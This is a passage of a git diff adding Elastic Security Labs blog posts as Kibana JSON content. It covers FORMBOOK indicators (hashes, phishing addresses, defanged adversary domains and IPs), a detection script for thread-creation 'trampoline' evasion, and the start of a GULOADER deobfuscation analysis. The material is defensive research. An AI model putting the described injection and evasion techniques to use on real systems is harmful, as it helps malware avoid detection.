[https://github.com/klezVirus/CVE-2021-40444](https://github.com/klezVirus/CVE-2021-40444)\n- [https://kentosec.com/2021/09/12/cve-2021-40444-poc-demonstration/](https://kentosec.com/2021/09/12/cve-2021-40444-poc-demonstration/)\n- [https://github.com/Edubr2020/CVE-2021-40444–CABless](https://github.com/Edubr2020/CVE-2021-40444--CABless)\n- [https://twitter.com/vxunderground/status/1436326057179860992?s=20](https://twitter.com/vxunderground/status/1436326057179860992?s=20)\n- [https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I](https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I)\n\n## Indicators\n\n| Indicator | Type | Reference from blog | Note |\n| ---------------------------------------------------------------- | ----------- | --------------------- | ------------------------------------ |\n| 70defbb4b846868ba5c74a526405f2271ab71de01b24fbe2d6db2c7035f8a7df | SHA256 | Request Document.docx | Testing phase email attachment |\n| 7c98db2063c96082021708472e1afb81f3e54fe6a4a8b8516e22b3746e65433b | SHA256 | comres.cab | Testing phase CAB archive |\n| 363837d5c41ea6b2ff6f6184d817c704e0dc5749e45968a3bc4e45ad5cf028d7 | SHA256 | 1.doc.inf | Testing phase VMProtect DLL |\n| 22cffbcad42363841d01cc7fef290511c0531aa2b4c9ca33656cc4aef315e723 | SHA256 | IEcache.inf | Testing phase DLL loader |\n| e2ab6aab7e79a2b46232af87fcf3393a4fd8c4c5a207f06fd63846a75e190992 | SHA256 | Pope.txt | Testing phase JavaScript |\n| 170eaccdac3c2d6e1777c38d61742ad531d6adbef3b8b031ebbbd6bc89b9add6 | SHA256 | Profile.rar | Production phase email attachment |\n| d346b50bf9df7db09363b9227874b8a3c4aafd6648d813e2c59c36b9b4c3fa72 | SHA256 | document.docx | Production phase compressed document |\n| 776df245d497af81c0e57fb7ef763c8b08a623ea044da9d79aa3b381192f70e2 | SHA256 | abb01.exe | Production phase dropper |\n| 95e03836d604737f092d5534e68216f7c3ef82f529b5980e3145266d42392a82 | SHA256 | Profile.html | Production phase JavaScript |\n| bd1c1900ac1a6c7a9f52034618fed74b93acbc33332890e7d738a1d90cbc2126 | SHA256 | yxojzzvhi0.exe | FORMBOOK malware |\n| 0c560d0a7f18b46f9d750e24667721ee123ddd8379246dde968270df1f823881 | SHA256 | DWG.rar | Generic phase email attachment |\n| 5a1ef64e27a8a77b13229b684c09b45a521fd6d4a16fdb843044945f12bb20e1 | SHA256 | D2110-095.gz | Generic phase email attachment |\n| 4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096 | SHA256 | D2110-095.exe DWG.exe | FORMBOOK malware |\n| admin0011[@]issratech.com | email-addr | | Phishing sending email address |\n| admin010[@]backsjoy.com | email-addr | | Phishing sending email address |\n| admin012[@]leoeni.com | email-addr | | Phishing sending email address |\n| issratech[.]com | domain-name | | Adversary controlled domain |\n| backsjoy[.]com | domain-name | | Adversary controlled domain |\n| leonei[.]com | domain-name | | Adversary controlled domain |\n| 2[.]56[.]59[.]105 | ipv4-addr | | IP address of issratech[.]com |\n| 212[.]192[.]241[.]173 | ipv4-addr | | IP address of backsjoy[.]com |\n| 52[.]128[.]23[.]153 | ipv4-addr | | IP address of leonei[.]com |\n| 104[.]244[.]78[.]177 | ipv4-addr | | Adversary controlled IP address |\n\n## Artifacts\n\nArtifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4f6fe2c619b93195/628e88d930bc9653db3af066/formbook-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n"
+ },
+ "title": "FORMBOOK Adopts CAB-less Approach",
+ "slug": "formbook-adopts-cab-less-approach",
+ "date": "2022-06-07",
+ "description": "Campaign research and analysis of an observed FORMBOOK intrusion attempt.",
+ "author": [
+ {
+ "slug": "derek-ditch"
+ },
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "blog-security-laptop-720x420.png",
+ "category": [
+ {
+ "slug": "campaigns"
+ }
+ ],
+ "tags": [
+ "formbook",
+ "malware",
+ "phishing",
+ "cve-2021-40444"
+ ]
+ },
+ "id": "security_labs_content-formbook_adopts_cab_less_approach-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-get_injectedthreadex_detection_thread_creation_trampolines-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-get_injectedthreadex_detection_thread_creation_trampolines-md.json
new file mode 100644
index 00000000000..da29fa5b145
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-get_injectedthreadex_detection_thread_creation_trampolines-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Get-InjectedThreadEx – Detecting Thread Creation Trampolines\"\nslug: \"get-injectedthreadex-detection-thread-creation-trampolines\"\ndate: \"2022-12-07\"\ndescription: \"In this blog, we will demonstrate how to detect each of four classes of process trampolining and release an updated PowerShell detection script – Get-InjectedThreadEx\"\nauthor:\n - slug: john-uhlmann\nimage: \"photo-edited-02-e.jpg\"\ncategory:\n - slug: security-research\ntags:\n - windows internals\n - process injection\n - defense evasion\n---\n\nThe prevalence of [memory resident malware](https://www.elastic.co/blog/hunting-memory) remains extremely high. Defenders have imposed significant costs on file-based techniques, and malware must typically utilize [in-memory techniques](https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process) to avoid detection. In Elastic's recently-published [Global Threat Report](https://t.co/3PZDENisXK), defense evasion is the most diverse tactic we observed and represents an area of rapid, continuous innovation.\n\nIt is convenient, and sometimes necessary, for memory-resident malware to create its own threads within its surrogate process. Many such threads can be detected with relatively low noise by identifying those which have a start address not backed by a Portable Executable (PE) image file on disk. This detection technique was originally conceived by Elastic's [Gabriel Landau](https://twitter.com/GabrielLandau) and Nicholas Fritts for the Elastic Endgame product. Shortly thereafter, it was released as a PowerShell script for the benefit of the community in the form of [Get-InjectedThread](https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2) with the help of [Jared Atkinson](https://twitter.com/jaredcatkinson) and Elastic's [Joe Desimone](https://twitter.com/dez_) at the [2017 SANS Threat Hunting and IR Summit](https://www.slideshare.net/JoeDesimone4/taking-hunting-to-the-next-level-hunting-in-memory).\n\nAt a high level, this approach detects threads created with a user start address in unbacked executable memory. Unbacked executable memory itself is quite normal in many processes such as those that do just-in-time (JIT) compilation of bytecode or scripts like .NET or javascript. However, that JIT’d code rarely manages its own threads – usually that is handled by the runtime or engine.\n\n\n\nHowever, an adversary often has sufficient control to create a thread with an image-backed start address which will subsequently transfer execution to their unbacked memory. When this transfer is done immediately, it is known as a “trampoline” as you are quickly catapulted somewhere else.\n\nThere are four broad classes of trampolines – you can build your own from scratch, you can use an illusionary trampoline, you can repurpose something else as a trampoline, or you can simply find an existing trampoline.\n\nIn other words - hooks, hijacks, gadgets and functions.\n\nEach of these will bypass our original unbacked executable memory heuristic.\n\nI highly recommend these two excellent blogs as background:\n\n- [Understanding and Evading Get-InjectedThread](https://blog.xpnsec.com/undersanding-and-evading-get-injectedthread/) by Adam Chester.\n- [Avoiding Get-InjectedThread for Internal Thread Creation](https://www.trustedsec.com/blog/avoiding-get-injectedthread-for-internal-thread-creation/) by Christopher Paschen.\n\nIn this blog, we will demonstrate how to detect each of these classes of bypass and release an updated PowerShell detection script – [Get-InjectedThreadEx](https://github.com/jdu2600/Get-InjectedThreadEx).\n\n## CreateThread() overview\n\nAs a quick recap, the Win32 [CreateThread()](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread) API lets you specify a pointer to a desired StartAddress which will be used as the entrypoint of a function that takes exactly one user-provided parameter.\n\n\n\nSo, CreateThread() is effectively a simple shellcode runner.\n\n\n\nAnd its sibling, [CreateRemoteThread()](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread) is effectively remote process injection.\n\nThe value of the lpStartAddress parameter is stored by the kernel in the Win32StartAddress field within the [ETHREAD](https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/ps/ethread/) structure for that thread.\n\n\n\nThis value can be queried from user mode using the documented [NtQueryInformationThread()](https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationthread) syscall with the ThreadQuerySetWin32StartAddress information class. A subsequent call to [VirtualQueryEx()](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualqueryex) can be used to make a second syscall requesting the [basic memory information](https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-memory_basic_information) for that virtual address from the kernel. This includes an enumeration indicating whether the memory is a mapped PE image, a mapped file, or simply private memory.\n\n\n\nWhile the original script was a point-in-time retrospective detection implementation, the same information is available inline during [create thread notify](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreatethreadnotifyroutine) kernel callbacks. All effective Endpoint Detection and Response (EDR) products should be providing telemetry of suspicious thread creations.\n\nAnd all effective Endpoint Protection Platform (EPP) products should be denying suspicious thread creations by default – with a mechanism to add allowlist entries for legitimate software exhibiting this behavior.\n\nIn the wild, you’ll see “legitimate” instances of this behavior such as from other security products, anti-cheat software, older copy-protection software and some Unix products that have been shimmed to work on Windows. Though, in each instance, this security [code smell](https://en.wikipedia.org/wiki/Code_smell) may be indicative of software that you might not want in an enterprise environment. The use of these methods may be a leading indicator that other [security best practices](https://blog.trailofbits.com/2018/09/26/effortless-security-feature-detection-with-winchecksec/) have not been followed. Even with this finite set of exceptions to handle, this detection and/or prevention approach remains highly relevant and successful today.\n\n### 1 - Bring your own trampoline\n\nThe simplest trampoline is a small hook. The adversary only needs to write the necessary jump instruction into existing image-backed memory. This is the approach that Filip Olszak used to bypass Get-InjectedThread with [DripLoader](https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection).\n\nThese bytes can even be restored to their original values immediately after thread creation. This helps to avoid retrospective detections such as our script – but recall that your endpoint security product should be doing _inline_ detection and will be able to scrutinize the hooked thread entrypoint at execution time, and deny execution if necessary.\n\n\n\nThe above proof-of-concept hooks ntdll!DbgUiRemoteBreakin, which is a legitimate remote thread start address, though it should rarely be seen in production environments. In practice, the hook can be placed on any function bytes unlikely to be called in normal operation– or even slack space between functions, or at the end of the PE section.\n\nAlso note the use of WriteProcessMemory() instead of a simple memcpy(). MEM_IMAGE pages are typically read only, and the former handles toggling the page protections to writable and back for us.\n\nWe can detect hooked start addresses fairly easily because we can detect persistent inline hooks fairly easily. In order to save memory, allocations for shared libraries use the same backing physical memory pages and are marked COPY_ON_WRITE in each process’s address space. So, as soon as the hook is inserted, the whole page can no longer be shared. Instead, a copy is created in the working set of the process.\n\nUsing the [QueryWorkingSetEx()](https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-queryworkingsetex) API, we can query the kernel to determine whether the page containing the start address is sharable or is in a private working set.\n\nNow we know that something on the page was modified – but we don’t know if our address was hooked. And, for our updated PowerShell script, this is all that we do. Recall that the bytes can be unhooked after the thread has started– so any further checks on already running threads could result in a false negative.\n\nHowever, this could also be a false positive if there is a “legitimate” hook or other modification.\n\nIn particular, many, many security products still hook ntdll.dll. This was an entirely legitimate technical approach back in 2007 when Vista was released: it allowed existing x86 features based on kernel syscall hooks to be quickly ported to the nascent x64 architecture using user mode syscall hooks instead. The validity of such approaches has been more questionable since Windows 10 was released in 2015. Around this time, x64 was cemented as the primary Windows architecture and we could firmly relegate the less secure x86 Windows to legacy status. The value proposition for user mode hooking was further reduced in 2017 when Windows 10 Creators Update [added additional kernel mode instrumentation](https://blog.redbluepurple.io/windows-security-research/kernel-tracing-injection-detection) to provide more robust detection approaches for malicious usage of certain abused syscalls.\n\nFor reference, our original Elastic Endgame product has features implemented using user mode hooks whereas our newer Elastic Endpoint has not yet determined a need to use a user mode hook at all in order to attain equal or better protection compared to Endgame. This means that Elastic Endgame must defend these hooks from tampering whereas Elastic Endpoint is currently invulnerable to the various so-called “universal EDR bypasses” that perform ntdll.dll unhooking.\n\nOlder security products aside, there are also many products that extend the functionality of other products via hooks– or perhaps unpack their code at runtime, etc. So, if that 4KB page is private, then security products need to additionally compare the start address bytes to an original pristine copy and alert if they differ.\n\nAnd, to deploy at scale, they also need to maintain an allowlist for those rare legitimate uses.\n\n### 2 - Shifting the trampoline mat\n\nTechnically the security product will only be able to see the bytes at the time of the thread notification callback which is slightly before the thread executes. Malware could create a [suspended](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread#parameters) thread, let the thread callback execute, and only then hook the start bytes before finally resuming the thread. Don’t worry though - effective security products can detect that inline too. But that’s a topic for another day.\n\nThis brings us to the second trampoline approach though: hijacking the execution flow before the entrypoint is ever called. Why obviously hook the thread entrypoint of our suspended thread when, with a little sleight of hand, we can usurp execution by modifying its instruction pointer directly (or an equivalent context manipulation) with [SetThreadContext()](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext), or by queuing an [“early bird” Asynchronous Procedure Call](https://www.cyberbit.com/endpoint-security/new-early-bird-code-injection-technique-discovered/) (APC)?\n\nThe problem with creating the illusion of a legitimate entrypoint like this is that it doesn’t hold up to any kind of rigorous inspection.\n\nIn a normal thread, the user mode start address is typically the third function call in the thread’s stack – after ntdll!RtlUserThreadStart and kernel32!BaseThreadInitThunk. So when the thread has been hijacked, this is going to be obvious in the call stack.\n\nFor instruction pointer manipulation, the first frame will belong to the injected code.\n\nFor “early bird” APC injection, the base of the call stack will be ntdll!LdrInitializeThunk, ntdll!NtTestAlert, ntdll!KiUserApcDispatcher and then the injected code.\n\nThe updated script detects various anomalous call stack bases.\n\nFalse positives are possible where legitimate software finds it necessary to modify Windows process or thread initialisation. For example, this was observed with the [MSYS2](https://www.msys2.org/) Linux environment. There is also an edge case where a function might have been generated with a [Tail Call Optimisation](https://en.wikipedia.org/wiki/Tail_call) (TCO), which eliminates unnecessary stack frames for performance. However, these cases can all be easily handled with a small exception list.\n\n### 3 - If it walks like a trampoline, and it talks like a trampoline...\n\nThe third trampoline approach is to find a suitable gadget within image-backed memory so that no code modification is necessary. This is one of the approaches that Adam Chester employed in his blog.\n\nOur earlier hook was 12 bytes and finding an exact 12-byte gadget is unlikely in practice.\n\nHowever, on x64 Windows, functions use a four-register fast-call calling convention by default. So when the OS calls our gadget we will have control over the RCX register which will contain the parameter we passed into CreateThread().\n\nThe simplest x64 gadget is the two-byte JMP RCX instruction “ff e1” – which is fairly trivial to find.\n\n\n\nGadgets don’t even need to be instructions per se – they could be within operands or other data in the code section. For example, the above “ff e1” gadget in ntdll.dll was part of the relative address of a GUID.\n\nWe can detect this too- because it doesn’t work generically yet.\n\nIn all modern Windows software, thread start addresses are protected by Control Flow Guard (CFG) which has a bitmap of valid indirect call targets computed at compile time. In order to use this gadget, malware must either first disable CFG or call the [SetProcessValidCallTargets()](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-setprocessvalidcalltargets) function to ask the kernel to dynamically set the bit corresponding to this gadget in the CFG bitmap.\n\nJust to be clear: this is not a CFG bypass. It is a CFG feature to support legitimate software doing weird things. Remember that CFG is an exploit protection– and being able to call SetProcessCallTargets() in order to call CreateThread() is a chicken and egg problem for exploit developers.\n\nLike before, to save memory, the CFG bitmap pages for DLLs are also shared between processes. This time we can detect whether the start address’s CFG bitmap entry is on a sharable page or in a private working set- and alert if it is private.\n\nControl Flow Guard is described in detail [elsewhere](https://www.blackhat.com/docs/us-15/materials/us-15-Zhang-Bypass-Control-Flow-Guard-Comprehensively-wp.pdf), but a high level CFG overview here is helpful to understanding our approach to detection. Each two bits in the CFG bitmap corresponds to 16 addresses. Two bits gives us four states. Specifically, in a pretty neat optimization by Microsoft, two states correspond only to the 16-byte aligned address (allowed, and export suppressed) and two states correspond to all 16 addresses (allowed and denied).\n\nModern CPUs fetch instructions in 16-byte lines so modern compilers typically align the vast majority of function entrypoints to 16-bytes. The vast majority of CFG entries only set a single address as a valid indirect call target, and very few entries will specify a whole block of 16 addresses as valid call targets. This means that the CFG bitmap can be an eighth of the size without any appreciable increase in the risk of valid gadgets due to an overly permissive bitmap.\n\nHowever, if each two bits corresponds to 16 addresses, then a private 4K page of CFG bits corresponds to 256KB of code. That’s quite the false positive potential!\n\nTherefore, we just have to hope that legitimate code never does this… nevermind. You should never hope that legitimate code won’t do obscure things. To date, we’ve identified three contemporary scenarios:\n\n- The legacy Edge browser would [harden its javascript host process](https://web.archive.org/web/20161031134827/http://blog.trendmicro.com/trendlabs-security-intelligence/control-flow-guard-improvements-windows-10-anniversary-update/) by un-setting CFG bits for certain abusable functions\n- user32.dll appears to be too kind to legacy software – and will un-suppress export addresses if they are registered as call back functions\n- Some security products will drop a page of hook trampolines too close to legitimate modules and private executable memory always has private bitmap entries (Actually they’ll often drop this at a module’s preferred load address – which prevents the OS from sharing memory for that module)\n\nSo we need to rule out false positives by comparing against an expected CFG bitmap value. We could read this from the PE file on disk, but the x64 bitmap is already mapped into our process as part of the shared CFG bitmap.\n\nThe PowerShell script implementation we’ve released alerts on both cases: a modified CFG page and a start address with a non-original CFG value.\n\nA very small number of CFG-compatible gadgets [might](https://i.blackhat.com/briefings/asia/2018/asia-18-Lain-Back-To-The-Epilogue-How-To-Evade-Windows-Control-Flow-Guard-With-Less-Than-16-Bytes.pdf) [exist](https://www.ndss-symposium.org/wp-content/uploads/2018/02/ndss2018_05A-3_Biondo_paper.pdf) at a given point in time, but only in very specific DLLs that will likely appear anomalous in the surrogate process.\n\n### 4 - It's literally already a trampoline\n\nThe third bypass category is to find an existing function that does exactly what we want, and there are many of these. For example, the one highlighted by Christopher Paschen is Microsoft’s C Runtime (CRT). This implementation of the C standard library works as an API layer that sits above Win32– and it includes thread creation APIs.\n\nThese APIs perform some extra CRT bookkeeping on thread creation/destruction by passing an internal CRT thread entrypoint to CreateThread() and by passing the user entrypoint to subsequently call as part of the structure pointed to by the CreateThread() parameter.\n\nSo, in this case, the Win32StartAddress observed will be the non-exported msvcrt!\\_startthread(ex). The shellcode address will be at a specific offset from the thread parameter during thread creation (Microsoft CRT source is available), and the shellcode will be the next frame on the call stack after the CRT.\n\nNote: without additional tricks this can only be used to create in-process threads and there is no CreateRemoteThread() equivalent. Those tricks exist, however, and you should not expect this module as a start address in remote threads.\n\nUnfortunately, there is no operating system bookkeeping that will tell you if a thread was created remotely after the fact. Consequently, we can’t scan for this with our script– but the inline callbacks used by security products can make this distinction.\n\nCurrently, the script simply traverses the stack bottom-up and infers the first handful of frames by looking at candidate return addresses. This code could definitely be improved via disassembly or using unwind information, which are less rewarding to implement in PowerShell. The current approach is reliable enough for demonstration purposes:\n\n\n\n\n\nThe updated script detects the original suspicious thread in addition to the four classes of bypass described in this research.\n\n## Hunting suspicious thread creations\n\nIn addition to detections for the four known major classes of thread start address trampolines, the updated script also includes some additional heuristics. Some of these have medium false positive rates and are hidden behind an -Aggressive flag. However, they may still be useful in hunting scenarios.\n\n have structure- except when they don’t. There is no decompiler in PowerShell as far as we know – so we approximated with a byte pattern regular expression instead. Identifying code that doesn’t follow convention is useful but could easily exist in a compiler that we haven’t tested against.\n\nInterestingly, we had to account for the “MZ” magic bytes that correspond to a [DOS Executable](https://en.wikipedia.org/wiki/DOS_MZ_executable) being a purportedly valid thread entrypoint. The Windows loader [ignores](https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/corexemain-function) the value of the AddressOfEntry field in the PE header for Common Language Runtime (CLR) executables such as .NET.\n\nInstead, execution always starts in MsCorEE!\\_CorExeMain() in the CLR Runtime which determines the actual process entrypoint from the CLR metadata. This makes sense as CLR assembly might only contain bytecode which needs to be JIT’d by the runtime before being called. However, the value of this field is still passed to CreateThread() and it is often zero- which results in the unexpected MZ entrypoint bytes.\n\n\n\nThe second heuristic examines the bytes immediately preceding the user entrypoint. This is usually a return, a jump, or a filler byte. Common filler bytes are zero, nop, and int 3. However, this is only a convention.\n\nIn particular, older compilers would regularly place data side by side with code- presumably to achieve performance through data locality. For example, we previously analysed the x64 binaries on Microsoft’s symbol server and noticed that this mixing of code and data was normal in Visual Studio 2012, was mostly remediated in VS2013, and appears to have been finally fixed in VS2015 Update 2.\n\n\n\nThe third heuristic is yet another compiler convention. As mentioned earlier, compilers like to output functions that maximize the instruction cache performance which typically use 16-byte fetches. But compilers appear to also like to save space– so they typically only ensure that the first basic block fits within the smallest number of 16-byte lines as opposed to strict 16-byte alignment. In other words, if a basic block is 20 bytes then it’ll always need at least two fetches, but we want to ensure that it doesn’t need three.\n\n\n\nMany common Win32 modules have no valid thread entrypoints at all– so check for these.\n\nThis list is definitely non-exhaustive.\n\nKernel32.dll is a special case. LoadLibrary is not technically a valid thread entrypoint– but CreateRemoteThread(kernel32!LoadLibraryA, “signed.dll”) is actually how most security products would prefer software to do code injection into running processes when necessary. That is, the injected code is signed and loaded into read-only image-backed memory. To the best of our knowledge, we believe that this approach was first proposed by Jeffrey Richter in an article in the May 1994 edition of the Microsoft System Journal and later included in his [Advanced Windows](https://openlibrary.org/books/OL1120758M/Advanced_Windows) book. So treat LoadLibrary as suspicious- but not necessarily malicious.\n\n ntdll.dll is loaded everywhere so is often the first choice for a gadget or hook. There are only four valid ntdll entrypoints that we know of and the script explicitly checks for these.\n\nTwo of these functions aren’t exported, and rather than using P/Invoke to download the public symbols and find the offset in the PDB, the script dynamically queries the start addresses of its own threads for their start addresses to find these. PowerShell already uses worker threads, and the script starts a private ETW logger session to force a thread with the final address.\n\n Side-loaded DLLs remain a highly popular technique- and are still predominantly unsigned.\n\n\n\nThis one isn’t a thread start heuristic- but it was too simple not to include. Legitimate threads might impersonate SYSTEM briefly, but (lazy) malware authors (or operators) tend to escalate privileges initially and hold them indefinitely.\n\n## Wrapping up\n\nAs flagged last time, nothing in security is a silver bullet. You should not expect 100% detection from suspicious thread creations alone.\n\nFor example, an adversary could modify their tools to simply not create any new threads, restricting their execution to hijacked threads only. The distinction is perhaps subtle, but Get-InjectedThreadEx only attempts to detect anomalous thread creation addresses – not the broader case of legitimate threads that were subsequently hijacked. This is why, in addition to imposing costs at thread creation, [Elastic Security](https://www.elastic.co/endpoint-security/) employs other defensive layers including [memory signatures](https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures), [behavioral detections](https://www.elastic.co/blog/elastic-security-opens-public-detection-rules-repo) and [defense evasion detections](https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack).\n\nWhile it is somewhat easy to hijack a single thread after creation (ensuring that all your malware’s threads, including any third-party payloads, uses the right version of the right detection bypass for the installed security products), this is a maintenance cost for the adversary and mistakes will be made.\n\nLet’s keep raising the bar. We’d love to hear about thread creation bypasses- and scalable detection approaches. We’re stronger together.\n"
+ },
+ "title": "Get-InjectedThreadEx – Detecting Thread Creation Trampolines",
+ "slug": "get-injectedthreadex-detection-thread-creation-trampolines",
+ "date": "2022-12-07",
+ "description": "In this blog, we will demonstrate how to detect each of four classes of process trampolining and release an updated PowerShell detection script – Get-InjectedThreadEx",
+ "author": [
+ {
+ "slug": "john-uhlmann"
+ }
+ ],
+ "image": "photo-edited-02-e.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ],
+ "tags": [
+ "windows internals",
+ "process injection",
+ "defense evasion"
+ ]
+ },
+ "id": "security_labs_content-get_injectedthreadex_detection_thread_creation_trampolines-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-getting_gooey_with_guloader_downloader-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-getting_gooey_with_guloader_downloader-md.json
new file mode 100644
index 00000000000..63fca07698c
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-getting_gooey_with_guloader_downloader-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Getting gooey with GULOADER: deobfuscating the downloader\"\nslug: \"getting-gooey-with-guloader-downloader\"\ndate: \"2023-12-06\"\ndescription: \"Elastic Security Labs walks through the updated GULOADER analysis countermeasures.\"\nauthor:\n - slug: daniel-stepanic\nimage: \"photo-edited-03@2x.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - guloader\n - cloudeye\n - Vectored Exception handler\n---\n\n## Overview\n\nElastic Security Labs continues to monitor active threats such as GULOADER, also known as [CloudEyE](https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye) – an evasive shellcode downloader that has been highly active for years while under constant development. One of these recent changes is the addition of exceptions to its Vectored Exception Handler (VEH) in a fresh campaign, adding more complexity to its already long list of anti-analysis tricks. \n \nWhile GULOADER’s core functionality hasn’t changed drastically over the past few years, these constant updates in their obfuscation techniques make analyzing GULOADER a time-consuming and resource-intensive process. In this post, we will touch on the following topics when triaging GULOADER:\n\n* Reviewing the initial shellcode and unpacking process\n* Finding the entrypoint of the decrypted shellcode\n* Discuss update to GULOADER’s VEH that obfuscates control flow\n* Provide a methodology to patch out VEH\n\n## Initial Shellcode\n\nIn our [sample](https://www.virustotal.com/gui/file/6ae7089aa6beaa09b1c3aa3ecf28a884d8ca84f780aab39902223721493b1f99), GULOADER comes pre-packaged inside an NSIS (Nullsoft Scriptable Install System) installer. When the installer is extracted, the main components are: \n\n* **NSIS Script** - This script file outlines all the various configuration and installation aspects.\n\n\n\n\n* **System.dll** - Located under the `$PLUGINSDir`. This file is dropped in a temporary folder to allocate/execute the GULOADER shellcode.\n\n\n\n\n* **Shellcode** - The encrypted shellcode is buried into a nested folder.\n\nOne quick methodology to pinpoint the file hosting the shellcode can be done by monitoring `ReadFile` events from SysInternal’s Process Monitor after executing GULOADER. In this case, we can see that the shellcode is read in from a file (`Fibroms.Hag`).\n\n\n\n\nGULOADER executes shellcode through callbacks using different Windows API functions. The main reasoning behind this is to avoid detections centered around traditional Windows APIs used for process injection, such as `CreateRemoteThread` or `WriteProcessMemory`. We have observed `EnumResourceTypesA` and `CallWindowProcW` used by GULOADER.\n\n\n\n\nBy reviewing the MSDN documentation for [`EnumResourceTypesA`](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcetypesa), we can see the second parameter expects a pointer to the callback function. From the screenshot above, we can see that the newly allocated shellcode is placed into this argument.\n\n\n\n\n\n\n\n## Finding Main Shellcode Entrypoint\n\nIn recent samples, GULOADER has increased the complexity at the start of the initial shellcode by including many different junk instructions and jumps. Reverse engineering of the downloader can require dealing with a long process of unwinding code obfuscation designed to break disassembly and control flow in some tooling, making it frustrating to find the actual start of the core GULOADER shellcode.\n\nOne methodology for finding the initial call can be leveraging graph view inside x64dbg and using a bottom-to-top approach to look for the `call eax` instruction. \n\n\n\n\nAnother technique to trace the initial control flow involves leveraging the reversing engineering framework [Miasm](https://github.com/cea-sec/miasm)**.** Below is a quick example where we can pass in the shellcode and disassemble the instructions to follow the flow: \n\n```\nfrom miasm.core.locationdb import LocationDB\nfrom miasm.analysis.binary import Container\nfrom miasm.analysis.machine import Machine\n\nwith open(\"proctoring_06BF0000.bin\", \"rb\") as f:\n code = f.read()\n\nloc_db = LocationDB()\nc = Container.from_string(code, loc_db)\n\nmachine = Machine('x86_32')\nmdis = machine.dis_engine(c.bin_stream, loc_db=loc_db)\nmdis.follow_call = True \nmdis.dontdis_retcall = True\nasm_cfg = mdis.dis_multiblock(offset=0x1400)\n```\n\nMiasm cuts through the 142 `jmp` instructions and navigates through the junk instructions where we have configured it to stop on the call instruction to EAX (address: `0x3bde`). \n\n```\nJMP loc_3afd\n->\tc_to:loc_3afd \nloc_3afd\nMOV EBX, EAX\nFADDP ST(3), ST\nPANDN XMM7, XMM2\nJMP loc_3b3e\n->\tc_to:loc_3b3e \nloc_3b3e\nSHL CL, 0x0\nPSRAW MM1, MM0\nPSRLD XMM1, 0xF1\nJMP loc_3b97\n->\tc_to:loc_3b97 \nloc_3b97\nCMP DL, 0x3A\nPADDW XMM3, XMM5\nPXOR MM3, MM3\nJMP loc_3bde\n->\tc_to:loc_3bde \nloc_3bde\nCALL EAX\n```\n*Tail end of Miasm*\n\n## GULOADER’s VEH Update\n\nOne of GULOADER’s hallmark techniques is centered around its [Vectored Exception Handling](https://learn.microsoft.com/en-us/windows/win32/debug/vectored-exception-handling) (VEH) capability. This feature gives Windows applications the ability to intercept and handle exceptions before they are routed through the standard exception process. Malware families and software protection applications use this technique to make it challenging for analysts and tooling to follow the malicious code.\n\nGULOADER starts this process by adding the VEH using `RtlAddVectoredExceptionHandler`. Throughout the execution of the GULOADER shellcode, there is code purposely placed to trigger these different exceptions. When these exceptions are triggered, the VEH will check for hardware breakpoints. If not found, GULOADER will modify the EIP directly through the [CONTEXT structure](https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-context) using a one-byte XOR key (changes per sample) with a one-byte offset from where the exception occurred. We will review a specific example of this technique in the subsequent section. Below is the decompilation of our sample’s VEH:\n\n\n\n\nAlthough this technique is not new, GULOADER continues to add new exceptions over time; we have recently observed these two exceptions added in the last few months:\n\n* `EXCEPTION_PRIV_INSTRUCTION`\n* `EXCEPTION_ILLEGAL_INSTRUCTION`\n\nAs new exceptions get added to GULOADER, it can end up breaking tooling used to expedite the analysis process for researchers. \n\n### EXCEPTION_PRIV_INSTRUCTION\n\nLet’s walk through the two recently added exceptions to follow the VEH workflow. The first exception (`EXCEPTION_PRIV_INSTRUCTION`), occurs when an attempt is made to execute a privileged instruction in a processor’s instruction set at a privilege level where it’s not allowed. Certain instructions, like the example below with [WRSMR](https://www.felixcloutier.com/x86/wrmsr) expect privileges from the kernel level, so when the 